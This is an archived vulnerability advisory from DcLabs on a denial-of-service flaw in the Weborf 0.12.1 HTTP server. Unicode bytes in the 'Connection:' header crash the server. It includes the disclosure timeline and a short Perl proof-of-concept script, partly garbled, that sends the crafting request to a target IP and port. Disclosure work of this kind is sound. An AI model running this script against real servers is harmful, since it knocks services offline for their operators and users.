AOH :: HP Unsorted W :: B1A-1345.HTM

Weborf DCA-00012 Vulnerability Report
Weborf DCA-00012 Vulnerability Report
Weborf DCA-00012 Vulnerability Report


- Weborf HTTP Server

[Vendor Product Description]
- Weborf is a lightweight Web server written in C. It supports IPv6
and basic authentication. It doesn't implement the full HTTP
specification, but can be used to easily share directories or files.

[Bug Description]
- Weborf HTTP Server can't handle unicode characters in "Connection: "
general header-field leading to a Denial-of-Service flaw

- Advisory sent to vendor on 06/21/2010.
- Vendor reply 06/22/2010.
- Vendor patch published 06/23/2010

- Low

[Affected Version]
-Weborf 0.12.1
- Prior versions may also be vulnerable.


use IO::Socket;

        if (@ARGV < 1) {

        $ip     = $ARGV[0];
        $port   = $ARGV[1];

        print "[+] Sending request...\n";

        $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
        print $socket "GET / HTTP/1.0\r\n";
        print $socket "Connection: ". "\0x99" x 4 ."\r\n\r\n";


        print "[+] Done!\n";

sub usage() {
        print "[-] Usage: <". $0 .">  \n";
        print "[-] Example: ". $0 ." 80\n";

DcLabs Security Group
Sponsor: ipax 

Crash and all DcLabs members.

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH
We do not send spam. If you have received spam bearing an email address, please forward it with full headers to